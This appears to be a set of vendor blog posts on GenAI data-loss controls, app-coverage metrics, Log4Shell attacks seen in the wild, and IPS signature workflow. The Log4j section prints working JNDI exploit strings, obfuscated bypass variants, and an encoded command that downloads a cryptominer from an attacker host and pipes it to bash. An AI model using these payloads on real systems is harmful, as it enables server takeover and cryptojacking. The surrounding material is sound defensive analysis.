Demystifying GenAI security, and how Cato helps you secure your organization's access to ChatGPT

Over the past year, countless articles, predictions, prophecies and premonitions have been written about the risks of AI, with GenAI (Generative AI) and ChatGPT at the center, ranging from its ethics to far-reaching societal and workforce implications ("No Mom, The Terminator isn't becoming a reality... for now").

Cato security research and engineering were fascinated enough by the prognostications and worries that we decided to examine the risks ChatGPT poses to businesses. What we found can be summarized into several key conclusions:

There is presently more scaremongering than actual risk to organizations using ChatGPT and the like.
The benefits to productivity far outweigh the risks.
Organizations should nonetheless deploy security controls to keep their sensitive and proprietary information out of tools such as ChatGPT, since the threat landscape can shift rapidly.

Concerns explored

A good deal of said scaremongering concerns the privacy aspects of ChatGPT and the underlying GenAI technology: what exactly happens to the data shared with ChatGPT; how it is used (or not used) to train the model in the background; how it is stored (if it is stored at all); and so on. The issue is the risk of data breaches and leaks of a company's intellectual property when users interact with ChatGPT. Some typical scenarios:

Employees using ChatGPT – A user uploads proprietary or sensitive information to ChatGPT, such as a software engineer uploading a block of code to have it reviewed by the AI. Could this code later be leaked through replies (inadvertently or maliciously) in other accounts if the model uses that data to further train itself? Spoiler: Unlikely, and no actual demonstration of systematic exploitation has been published.
Data breaches of the service itself – What exposure does an organization using ChatGPT have if OpenAI is breached, or if user data is exposed through bugs in ChatGPT? Could sensitive information leak this way? Spoiler: Possibly. At least one public incident was reported by OpenAI in which some users saw the chat titles of other users in their own accounts, due to a bug in OpenAI's infrastructure.

Proprietary GenAI implementations – AI already has its own dedicated MITRE framework of attacks, ATLAS, with techniques ranging from input manipulation to data exfiltration, data poisoning, inference attacks and so on. Could an organization's sensitive data be stolen through these methods? Spoiler: Yes. Methods range from harmless to theoretical all the way to practical, as showcased in a recent Cato Research post on the subject. In any case, securing proprietary implementations of GenAI is outside the scope of this article.

There's always a risk in everything we do. Going onto the internet carries risk too, but that doesn't stop billions of users from doing it every day; one just needs to take the appropriate precautions. The same is true of ChatGPT. While some scenarios are more likely than others, by looking at the problem from a practical point of view one can implement straightforward security controls for peace of mind.

[boxlink link=""] Everything You Wanted To Know About AI Security But Were Afraid To Ask | Watch the Webinar [/boxlink]

GenAI security controls

In a modern SASE architecture, which includes CASB and DLP as part of the platform, these use cases are easily addressable. Cato's platform is exactly that, and it offers a layered approach to securing the use of ChatGPT and similar applications inside the organization:

Control which applications are allowed, and which users/groups are allowed to use those applications
Control what text/data is allowed to be sent
Enforce application-specific options, e.g. opting out of data retention, tenant control, etc.
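The three layers listed above can be sketched as a simple policy chain. This is a minimal illustration of the layered model, not Cato's actual policy engine; all rule names, groups and field names here are made up for the example.

```python
# A minimal sketch of the three-layer control model listed above:
# (1) app allow-listing per user group, (2) inspecting what data is sent,
# (3) enforcing app-specific options such as training opt-out. All names
# and rules here are illustrative, not Cato's actual policy engine.
def evaluate(event: dict, allowed_apps: dict, blocked_data_types: set) -> str:
    # Layer 1: is this app allowed for this user's group?
    if event["app"] not in allowed_apps.get(event["group"], set()):
        return "block: app not allowed"
    # Layer 2: does the prompt carry a forbidden data classification?
    if event.get("data_type") in blocked_data_types:
        return "block: sensitive data"
    # Layer 3: app-specific option enforcement (e.g. chat history must be off).
    if event.get("chat_history_enabled", False):
        return "block: opt-out required"
    return "allow"

# Hypothetical policy: only OpenAI, and only for the legal group.
ALLOWED = {"legal": {"OpenAI"}}
```

An event passes only when all three layers allow it, which mirrors the order in which the controls are described below.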
The initial step is defining which AI applications are allowed and which user groups are allowed to use them. This can be done by combining the "Generative AI Tools" application category with the specific tools to allow, e.g., blocking all GenAI tools and only allowing "OpenAI".

A cornerstone of an advanced DLP solution is its ability to reliably classify data. The legacy approaches of exact data matches, static rules and regular expressions are all but obsolete when used on their own. For example, blocking a credit card number is simple with a regular expression, but in real-life scenarios involving financial documents there are many other means by which sensitive information can leak. It would be nearly pointless to try to keep up with changing data and fine-tune policies without a more advanced solution that just works.

Luckily, that is exactly where Cato's ML (Machine Learning) Data Classifiers come in. This is the latest addition to Cato's already expansive array of AI/ML capabilities integrated into the platform over the years. Our in-house LLM (Large Language Model), trained on millions of documents and data types, can natively identify documents in real time, serving as the perfect tool for such policies.

Let's look at the scenario of blocking specific text input to ChatGPT, for example uploading confidential or sensitive data through the prompt. Say an employee from the legal department is drafting an NDA (non-disclosure agreement) and, before finalizing it, gives it to ChatGPT to suggest improvements or even just to check the grammar. This could obviously violate the company's privacy policies, especially if the document contains PII.

Figure 1 - Example rule to block upload of Legal documents, using ML Classifiers

We can go deeper

To further demonstrate the power and flexibility of a comprehensive CASB solution, let us examine an additional aspect of ChatGPT's privacy controls.
There is an option in the settings to disable "Chat history & training", essentially letting users decide that they do not want their data to be used for training the model or retained on OpenAI's servers. This important privacy control is disabled by default; that is, by default all chats ARE saved by OpenAI and users are opted in, something an organization should avoid in any work-related activity with ChatGPT.

Figure 2 - ChatGPT's data control configuration

A good way to strike a balance between giving users the flexibility to use ChatGPT and keeping stricter controls is to allow only ChatGPT chats that have chat history disabled. Cato's CASB granular ChatGPT application allows for this flexibility: it can distinguish in real time whether a user is opted in to chat history and block the connection before data is sent.

Figure 3 – Example rule for "training opt-out" enforcement

Lastly, as an alternative (or complementary) approach to the above, it is possible to configure Tenant Control for ChatGPT access, i.e., enforce which accounts are allowed when accessing the application. In a possible scenario, an organization has corporate ChatGPT accounts with default security and data control policies enforced for all employees, and would like to make sure employees do not access ChatGPT with their personal accounts on the free tier.

Figure 4 - Example rule for tenant control

To learn more about Cato's CASB and DLP visit:

Busting the App Count Myth 

Many security vendors offer automated detection of cloud applications and services, classifying them into categories and exposing attributes such as security risk, compliance, company status, etc. Users can then apply different security measures, including setting firewall, CASB and DLP policies, based on the apps' categories and attributes.

It makes sense to conclude that the more apps are classified, the merrier. However, such a conclusion must be taken with a grain of salt. In this article, we'll question this preconception, discuss alternatives to app counts and offer a more comprehensive approach to optimizing cloud application security.

Stop counting apps by the numbers, start considering application coverage

Discussing the number of apps classified by a security vendor is irrelevant without considering actual traffic. A vendor offering a catalog of 100K apps would be just as good as a vendor offering a catalog of 2K apps for a client whose organization accesses 1K apps that are all covered by both vendors.

Generalizing this statement, we should consider a Venn diagram: the left circle represents the applications that are signed and classified by a security vendor, the right one represents the actual application traffic on the customer's network. Their intersection represents the app coverage: the part of the app catalog that is applicable to the customer's traffic.

Instead of focusing on the app count in our catalog, like some vendors do, Cato focuses on maximizing app coverage. The data and visibility we have as a cloud vendor allow our research teams to optimize app coverage for the entire customer base or, upon demand, for a certain customer category (e.g. geographical, business vertical, etc.).

Coverage as a function of app count

Focusing on app coverage still raises the question: "if we sign more apps, will the coverage increase?"
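Before answering, it helps to pin down the metric itself. Coverage is a flow-weighted intersection of the two Venn circles above, which is why the 100K-app and 2K-app catalogs can score identically. The app names and flow counts below are made up for illustration.

```python
def app_coverage(catalog: set, traffic_flows: dict) -> float:
    """Flow-weighted coverage: the fraction of observed traffic whose app
    is in the vendor's catalog. traffic_flows maps app name -> flow count."""
    total = sum(traffic_flows.values())
    covered = sum(n for app, n in traffic_flows.items() if app in catalog)
    return covered / total if total else 0.0

# Two hypothetical vendors: a 100K-app catalog and a 2K-app catalog.
# If both cover every app the customer actually uses, coverage is equal.
observed = {"app%d" % i: 10 for i in range(1000)}               # 1K apps in use
small_catalog = set(observed) | {"x%d" % i for i in range(1000)}   # ~2K apps
big_catalog = set(observed) | {"x%d" % i for i in range(99000)}    # ~100K apps
```

The catalog entries outside the intersection contribute nothing, regardless of how many there are.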
To understand the relationship between app count and app coverage, we collected a week of traffic across the entire Cato cloud to observe classified vs. unclassified traffic, sorted the app and category classifications in descending order by flow count, and then measured the contribution of application count to total coverage.

To focus on scenarios of cloud application protection, which are the main market concern in terms of application catalogs, our analysis is based on the traffic of HTTP outbound flows collected from Cato's data lake. Our findings:

Figure 1: Application coverage as a function of number of apps, based on the Cato Cloud data lake

From the plot above, you can see that:

10 applications cover 45.42% of the traffic
100 applications cover 81.6% of the traffic
1000 applications cover 95.58% of the traffic
2000 applications cover 96.41% of the traffic
4000 applications cover 96.72% of the traffic
9000 applications cover 96.78% of the traffic

It turns out that the last 5K apps added to Cato's app catalog contributed no more than 0.06% to our total coverage. The increase in app count yielded diminishing returns in terms of app coverage. The high 96.78% app coverage on the Cato cloud is the result of our systematic approach of classifying the apps seen in real customer traffic, prioritized by their contribution to application coverage.

Going further than total Cato-cloud coverage, we also examined per-account coverage using a similar methodology. Our findings:

91% of our accounts get a 90% (or higher) app coverage
82% of our accounts get a 95% (or higher) app coverage
77% of our accounts get a 96% (or higher) app coverage

Since app coverage is purely a function of Cato's classification (unrelated to customer configuration), the conclusion is that if you're a new Cato customer, there's a 91% chance that 90% of your traffic will be classified.
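The diminishing-returns curve above can be reproduced in miniature: sort per-app flow counts in descending order and accumulate. The synthetic Zipf-like distribution below is made up for illustration; it is not Cato's data, but it exhibits the same shape, where the top apps dominate and the tail adds almost nothing.

```python
def coverage_curve(flow_counts):
    """Given per-app flow counts, return cumulative coverage after signing
    the top-N apps, with apps sorted by flow count descending -- the same
    methodology as the measurement described above."""
    counts = sorted(flow_counts, reverse=True)
    total = sum(counts)
    curve, acc = [], 0
    for c in counts:
        acc += c
        curve.append(acc / total)
    return curve

# Synthetic heavy-tailed (Zipf-like) app popularity: app i gets ~1000/i flows.
flows = [1000 // (i + 1) for i in range(1000)]
curve = coverage_curve(flows)
```

On this toy data the first ten apps already cover a large share of traffic, while the last hundred apps barely move the curve, matching the 0.06% observation above in spirit.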
Taking it back to the Venn diagrams discussed above, this would look like:

App count is an easy measure to market. App coverage is where the real value is. Ask your vendor to tell you what percentage of your application traffic they classify after they show off their shiny app catalog.

[boxlink link=""] How to Best Optimize Global Access to Cloud Applications | Download the eBook [/boxlink]

The holy grail of 100% coverage

Is 100% application coverage possible? We took a deeper look at a week of traffic on the Cato cloud, focusing on traffic that is currently not classified into a Cato app or category. To get a sense of what it would take to classify it into apps, we classified this traffic by second-level domain (as opposed to full subdomain).

We found that 0.88% of the traffic doesn't show any domain name (probably caused by direct IP access). The remaining unclassified traffic, 2.34% of the total, was spread across 3.18 million distinct second-level domains, of which 3.12 million were seen on either fewer than 5 distinct client IPs or just a single Cato account.

This shows that there will always be an inherent long tail of unclassified traffic. At the vendor level, this makes "100% app coverage" unachievable.

Dealing with the unclassified

Classifying more and more apps to gain negligible coverage is like tilting at windmills. For both vendors and customers, we suggest that rather than chasing unclassified traffic, the long tail of unsigned apps be handled with proper security mitigations. For example:

Malicious traffic: protection against malicious traffic, such as communication with a C&C server, access to a phishing website, or drive-by malware delivery sites, must not be affected by the lack of app classification.
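The grouping step used in the long-tail analysis above, collapsing full hostnames to second-level domains, can be sketched as follows. Note this naive split is only an approximation: a production implementation should consult the Public Suffix List, since suffixes like co.uk would be mishandled here.

```python
def second_level_domain(host: str) -> str:
    """Collapse a full hostname to its second-level domain, the way the
    long-tail analysis above groups unclassified traffic. A real
    implementation should use the Public Suffix List; this naive split
    is only a sketch and mishandles multi-part suffixes like 'co.uk'."""
    parts = host.rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host
```

Grouping by second-level domain rather than full subdomain is what shrinks millions of distinct hostnames into a countable set of candidate "apps".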
In Cato, malware protection and IPS are independent of app classification, leaving customers protected even if the target site is not classified as a known app.

Shadow IT apps: unauthorized access to non-sanctioned applications requires:

Full visibility: it's good to keep visibility into all traffic, whether it's classified or not. Cato users can choose to monitor any activity, whether or not the traffic is classified into an app/category.
Data Loss Prevention: the use of unauthorized cloud storage or file-sharing services can lead to sensitive data leaking outside the organization. Cato has recently introduced the ability to DLP-scan all HTTP traffic, regardless of its app classification. In general, we recommend using this feature to set more restrictive policies on unknown cloud services.
Custom app detection: this feature introduces the ability to track and classify traffic per customer, for improved tracking of applications that are unclassified by Cato.

Conclusion

We have shown the futility of fixating on the number of apps in an app catalog as a measure of cloud app security strength. The diminishing returns of a growing app count challenge the prevailing notion that more is always better. Embracing a more meaningful measure, app coverage, emerges as a crucial pivot for assessing and optimizing cloud application security.

Effective security strategies must extend beyond app classification, acknowledging that full coverage is unfeasible. Mitigating risk with controls such as IPS and DLP addresses the gap left by the app long tail, and is a more feasible approach than the impossible hunt for 100% coverage.

In navigating the complex landscape of cloud application security, a nuanced approach that combines the right metrics with the appropriate security controls becomes paramount for ensuring comprehensive and adaptive protection.

Log4J – A Look into Threat Actors Exploitation Attempts

On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a very common Java logging tool. Exploiting this vulnerability allows attackers to take control of affected servers, which prompted a CVSS (Common Vulnerability Scoring System) severity level of 10. The vulnerability, dubbed Log4Shell (also referred to as LogJam), is particularly dangerous because of its simplicity: forcing the application to log just one simple string allows attackers to load and run their own malicious code on the application. To make things worse, working PoCs (Proofs of Concept) are already available on the internet, making even inexperienced attackers a serious threat.

Another reason this vulnerability is getting so much attention is the mass adoption of Log4j by many enterprises. Amazon, Steam, Twitter, Cisco, Tesla, and many others all make use of this library, which means different threat actors have a very wide range of targets from which to choose. As the old saying goes: not every system is vulnerable, not every vulnerability is exploitable, and not every exploit is usable, but when all of these align, the impact can be severe.

Quick Mitigation

At Cato, we were able to push mitigation in no time and deploy it across our network, requiring no action whatsoever from customers with IPS enabled. The deployment was announced in our Knowledge Base together with technical details for customers. Moreover, we were able to base our detections on traffic samples from the wild, minimizing the false-positive rate from the very first signature deployment and maximizing the protection span across different obfuscations and bypass techniques.

Here are a couple of interesting exploit attempts we saw in the wild. These attempts are a good representation of an attack's lifecycle and its adoption by various threat actors once such a vulnerability goes public.
[boxlink link=""] Ransomware is on the rise | Download eBook [/boxlink]

Exploit Trends and Anecdotes

We found exploit attempts using the standard attack payload:

${jndi:ldap://<MALICIOUS DOMAIN>/Exploit}

We also identified some interesting variations and trends:

Adopted by Scanners

Interestingly, we stumbled across scenarios of a single IP trying to send the malicious payload over a large variety of HTTP headers in a sequence of attempts:

Access-Control-Request-Method: ${jndi:ldap://<REDACTED_IP>:42468/a}
Access-Control-Request-Headers: ${jndi:ldap://<REDACTED_IP>:42468/a}
Warning: ${jndi:ldap://<REDACTED_IP>:42468/a}
Authorization: ${jndi:ldap://<REDACTED_IP>:42468/a}
TE: ${jndi:ldap://<REDACTED_IP>:42468/a}
Accept-Charset: ${jndi:ldap://<REDACTED_IP>:42468/a}
Accept-Datetime: ${jndi:ldap://<REDACTED_IP>:42468/a}
Date: ${jndi:ldap://<REDACTED_IP>:42468/a}
Expect: ${jndi:ldap://<REDACTED_IP>:42468/a}
Forwarded: ${jndi:ldap://<REDACTED_IP>:42468/a}
From: ${jndi:ldap://<REDACTED_IP>:34467/a}
X-Api-Version: ${jndi:ldap://<REDACTED_IP>:42468/a}
Max-Forwards: ${jndi:ldap://<REDACTED_IP>:34467/a}

Such behavior might be attributed to the Qualys vulnerability scanner, which claimed to add a number of tests that attempt to send the Log4j vulnerability payloads across different HTTP headers. While it's exciting to see the quick adoption of pentesting and scanning tools for this new vulnerability, one can't help but wonder what would happen if these tools were used by malicious actors.

Sinkholes Created

Inspecting attack traffic allowed us to find sinkhole addresses used for checking for vulnerable devices. Sinkholes are internet-facing servers that collect traffic sent to them when a vulnerability PoC proves successful. A bunch of HTTP requests with headers such as the ones below indicate the use of a sinkhole:

User-Agent: ${jndi:ldap://
User-Agent: ${jndi:ldap://}

We can tell that the sinkhole address matches the protocol and header on which the exploit attempt succeeds.
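The header-spraying behavior above suggests the detection side of the problem: a signature has to inspect every header, not just the common ones. Below is a minimal sketch of scanning all HTTP headers for the plain JNDI lookup pattern; it is illustrative only and catches just the unobfuscated form, not the bypass variants discussed later in this article.

```python
import re

# A minimal sketch of scanning every HTTP header for the basic Log4Shell
# lookup pattern. Real IPS signatures must also handle obfuscated
# variants; this regex catches only the plain form and common schemes.
JNDI_RE = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def flag_headers(headers: dict) -> list:
    """Return the names of headers carrying a plain JNDI lookup string."""
    return [name for name, value in headers.items() if JNDI_RE.search(value)]
```

Scanning the full header set is what lets a detector catch payloads hidden in uncommon headers like Accept-Datetime or Max-Forwards.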
This header was seen in the wild:

X-Api-Version: ${jndi:ldap://<REDACTED>

This is an example of using the Burp Collaborator platform for sinkholing successful PoCs. In this case, the header used was an uncommon one, trying to bypass security products that might have overlooked it. Among many sinkholes, we also noticed <string>, as mentioned here too.

Bypass Techniques

Bypass techniques are described in a couple of different GitHub projects ([1], [2]). These techniques mostly leverage syntactic flexibility to alter the payload into one that won't trigger signatures that capture only the traditional PoC example. Some others alter the target scheme from the well-known ldap:// to rmi://, dns:// or ldaps://. A funny one we found in the wild is:

GET /?x=${jndi:ldap://1.${hostName}.<REDACTED>}
Host: <REDACTED_IP>:8080
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.<REDACTED>}
Connection: close
Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.<REDACTED>}
Accept-Encoding: gzip

In this request, the attacker attempted three different attack methods: the regular one (in the query string), as well as two obfuscated ones (in the User-Agent and Referer headers). It seems they assumed a target that would modify the request, replacing the malicious part of the payload with a sanitized version. However, they missed the fact that many modern security vendors would drop this request altogether, leaving them exposed to being signed and blocked by their "weakest link of obfuscation."

Real Attacks – Cryptomining on the Backs of Exploitation Victims

While many of the techniques described above were used by pentesting tools and scanners to demonstrate a security risk, we also found true malicious actors attempting to leverage CVE-2021-44228 to drop malicious code on vulnerable servers.
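The two obfuscation tricks in the request above, ${::-x} default-value lookups and ${lower:x} case lookups, can be collapsed back to their literal characters before signature matching. The sketch below shows the idea; it is a simplified illustration and does not handle nested or recursive lookups the way a production normalizer must.

```python
import re

def normalize(payload: str) -> str:
    """Collapse two common Log4j obfuscation tricks back to literal text:
    ${::-x} default-value lookups and ${lower:x} case lookups. This is a
    simplified sketch; it does not handle nested or recursive lookups."""
    out = re.sub(r"\$\{::-(.)\}", r"\1", payload)   # ${::-j} -> j
    out = re.sub(r"\$\{lower:(.)\}", r"\1", out)    # ${lower:l} -> l
    return out
```

After normalization, both obfuscated headers from the request above reduce to the same ${jndi:ldap://... form that a plain signature can match.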
The attacks look like this:

Authorization: ff=${jndi:ldap://<REDACTED_IP>:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}

Base64-decoding the payload above reveals the attacker's intentions:

…
(wget -O – http[:]//<REDACTED_IP>:8005/acc||curl -o – http[:]//<REDACTED_IP>:8005/acc)|/bin/bash

Downloading the file named acc leads to bash code that downloads and runs the XMRig cryptominer. Furthermore, before doing so it closes all existing instances of the miner and shuts them off if their CPU usage is too high, to stay under the radar. Needless to say, the mined crypto coins make their way to the attacker's wallet. The SANS Honeypot Data API provides access to similar findings and variations of true attacks targeting their honeypots.

The Apache Log4j vulnerability poses a great risk to enterprises that fail to mitigate it in time. As we described, the vulnerability was promptly used not only by legitimate scanners and pentesting tools, but by novice and advanced attackers as well. Cato customers were well taken care of: we made sure the risk was promptly mitigated and notified our customers that their networks are safe. Read all about it in our blog post: Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability. So until the next time...
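The decoding step described above is straightforward to reproduce. The sketch below uses a harmless stand-in for the real blob (the actual one fetched a cryptominer installer and piped it to /bin/bash); the function name is ours, not part of any exploit kit.

```python
import base64

def decode_log4j_command(b64: str) -> str:
    """Decode the Command/Base64/<blob> portion of an exploit URL, as
    analysts do when triaging payloads like the one shown above."""
    return base64.b64decode(b64).decode("utf-8", errors="replace")

# Harmless stand-in payload with the same shape as the real one.
sample = base64.b64encode(
    b"(wget -O - http://host/acc||curl -o - http://host/acc)|/bin/bash"
).decode()
```

Decoding immediately exposes the download-and-execute intent, which is why Base64 wrapping offers attackers obscurity but no real protection from analysis.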

What Makes for a Great IPS: A Security Leader’s Perspective

A recent high-severity Apache server vulnerability kicked off a frenzy of activity as security teams raced to patch their web servers. The path traversal vulnerability, which can be used to map and leak files, was already known to be exploited in the wild, and companies were urged to deploy the patch as quickly as possible.

But Cato customers could rest easy. As with so many recent attacks and zero-day threats, Cato security engineers patched CVE-2021-41773 in under a week and, in this case, in just one day. What's more, the intrusion prevention system (IPS) patch generated zero false positives, which are all too common in an IPS. Here's how we're able to address zero-day threats so quickly and effectively.

Every IPS Must Be Kept Up to Date

Let's step back for a moment. Every network needs the protection of an IPS. Network-based threats have become more widespread, and an IPS is the right defensive mechanism to stop them. But traditionally, there has been so much overhead associated with an IPS that many companies failed to extract sufficient value from their IPS investments, or just avoided deploying them in the first place.

The increased use of encrypted traffic makes TLS/SSL inspection essential. However, inspecting encrypted traffic degrades IPS performance. IPS inspection is also location-bound and often does not extend to cloud and mobile traffic. Whenever a vulnerability notice is released, it's a race of who acts first: the attackers or the IT organization. IPS vendors may take days to issue a new signature. Even then, the security team needs more time to first test the signature to see if it generates false positives before deploying it on the live network.

[boxlink link=""] Ransomware is on the Rise | Here's how we can help!
[/boxlink]

Cato Has a Fine-Tuned Process to Respond Quickly to Vulnerabilities

The Cato SASE Cloud has an IPS-as-a-service that is fully integrated with our global network, bringing context-aware protection to users everywhere. Unlike with on-premises IPS solutions, even users and resources outside of the office benefit from IPS protection. Cato engineers are also fully responsible for the maintenance of this critical component of our security offerings. Our processes and architecture enable incredibly short times to remediate, like patching the above-mentioned Apache vulnerability in just one day. Other example response times to noted vulnerabilities include:

Date | Vulnerability | Cato Response
February 2021 | VMware vCenter RCE (CVE-2021-21972) | 2 days
March 2021 | MS Exchange SSRF (CVE-2021-26855) | 3 days
March 2021 | F5 vulnerability (CVE-2021-22986) | 2 days
July 2021 | PrintNightmare Spooler RCE (CVE-2021-1675) | 3 days
September 2021 | VMware vCenter RCE (CVE-2021-22005) | 1 day

In the case of the VMware vCenter RCE vulnerability, an exploit was released in the wild and threat actors were known to be using it, making it all the more critical to get the IPS patched quickly.

Cato Delivers Security Value to Customers

Cato eliminates the time needed to get change management approved, schedule a maintenance window, and find resources to update the IPS by harnessing a machine learning algorithm, our massive data lake, and security expertise. The first step in the process is automating the collection of threat information. We use different sources for this information, creating a constant feed of threats for us to analyze.
Among others, the main sources of threat information are:

The National Vulnerability Database (NVD), published by NIST
Social media, including tweets about CVEs that help us understand their importance
Microsoft's Active Protections Program (MAPP), a monthly report of vulnerabilities in Microsoft products, along with mitigation guidelines

The next step is to apply smart filtering. Many CVEs and vulnerabilities may be out of the scope of Cato's IPS. This mainly includes threats that are exploited locally, or ones that won't generate any network traffic passing through our points of presence (PoPs). Based mainly on the NVD classification, we can tell in advance if they are out of scope, making sure that we don't waste time on threats that are irrelevant to our secure access service edge (SASE) platform.

Once we know which vulnerabilities we need to research, we assess their priority using a couple of techniques. We measure social media traction using a proprietary machine learning service. Next, we estimate the risk of potential exploitation and the likelihood of the vulnerable product being installed at our customers' premises. This latter step is based on internet research, traffic samples, and simple common sense.

On top of all the above steps, we run mechanisms to push-notify our team in case a vulnerability gains significant traction in mainstream cybersecurity media as well as various hacker networks. We have found this to be a great indicator of the urgency of vulnerabilities.

Time Is Important but Accuracy Is Critical

Keeping an IPS up to date with timely threat information is important, but the accuracy of the signatures is even more so. Nobody wants to deal with multitudes of false-positive alerts. Cato makes a concerted effort to drive our false-positive rate down to zero.
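The smart-filtering and prioritization steps described above can be sketched as a small triage function. The field names loosely mirror the CVSS attack-vector concept in NVD records, but the records and scoring here are illustrative, not Cato's actual pipeline.

```python
# A sketch of the smart-filtering step: keep only CVEs whose CVSS attack
# vector indicates network exploitability (traffic that could traverse a
# PoP), then rank by base score. Field names loosely mirror NVD's CVSS
# data; the records are illustrative, not a live NVD feed.
def network_exploitable(cve: dict) -> bool:
    return cve.get("attackVector") == "NETWORK"

def triage(cves: list) -> list:
    """Filter out locally exploited CVEs, then sort by CVSS base score so
    the highest-risk vulnerabilities are researched first."""
    in_scope = [c for c in cves if network_exploitable(c)]
    return sorted(in_scope, key=lambda c: c.get("baseScore", 0), reverse=True)

feed = [
    {"id": "CVE-A", "attackVector": "NETWORK", "baseScore": 9.8},
    {"id": "CVE-B", "attackVector": "LOCAL", "baseScore": 7.8},   # out of scope
    {"id": "CVE-C", "attackVector": "NETWORK", "baseScore": 7.5},
]
```

Dropping locally exploited CVEs early is what keeps the research queue focused on threats an inline network platform can actually see.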
Once a threat is analyzed and a signature is available, we run the following procedure:

We reproduce an exploit, as well as possible variations of it, in a development environment so that we can thoroughly test the threat signature.
We run a "what if" scenario on sample historical traffic from our data lake to understand what our signature would trigger once deployed to our PoPs. This is a very powerful tool that saves us the back-and-forth of amending signatures that hit on legitimate traffic. Another benefit of this step is that we can test whether an attack attempt has already happened. On-premises IPS vendors can't do this last step.
We deploy the signature to production in silent mode and monitor its hits to make sure it's free of false positives. Once we are confident the signature is highly accurate, we move it into block mode.

All told, this process takes between a couple of hours and a couple of weeks, depending on the threat's priority.

Cato Provides Other Advantages Too

Cato's solution shifts the heavy security-processing burden from an appliance to the cloud, all while eliminating performance issues and false positives. It's worth mentioning again that all of the work to investigate vulnerabilities, create custom signatures to mitigate them, and deploy them across the entire network is on Cato. Customers do not need to do a thing other than keep up with our latest security updates in the Release Notes to realize the benefits of an up-to-date and highly accurate IPS.

To learn more about the features and benefits of Cato's IPS service, read Cato Adds IPS as a Service with Context-Aware Protection to Cato SD-WAN.
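The "what if" replay step described above can be sketched as running a candidate signature over labeled historical traffic samples and counting hits. Everything here is illustrative: the sample records, labels, and the toy signature stand in for the data-lake replay, not Cato's actual tooling.

```python
import re

def what_if(signature: str, samples: list) -> dict:
    """Replay a candidate signature (a regex here, for illustration) over
    historical traffic samples. Hit counts on known-benign samples warn of
    false positives before the signature ever reaches production."""
    rx = re.compile(signature)
    hits = [s for s in samples if rx.search(s["payload"])]
    return {
        "total": len(samples),
        "hits": len(hits),
        "benign_hits": sum(1 for s in hits if s["label"] == "benign"),
    }

# Toy historical samples: one real exploit attempt, two benign flows.
samples = [
    {"payload": "${jndi:ldap://evil.example/a}", "label": "malicious"},
    {"payload": "GET /index.html HTTP/1.1", "label": "benign"},
    {"payload": "template var ${jndi_total}", "label": "benign"},
]
```

A nonzero benign_hits count sends the signature back for amending, mirroring the silent-mode monitoring stage before block mode is enabled.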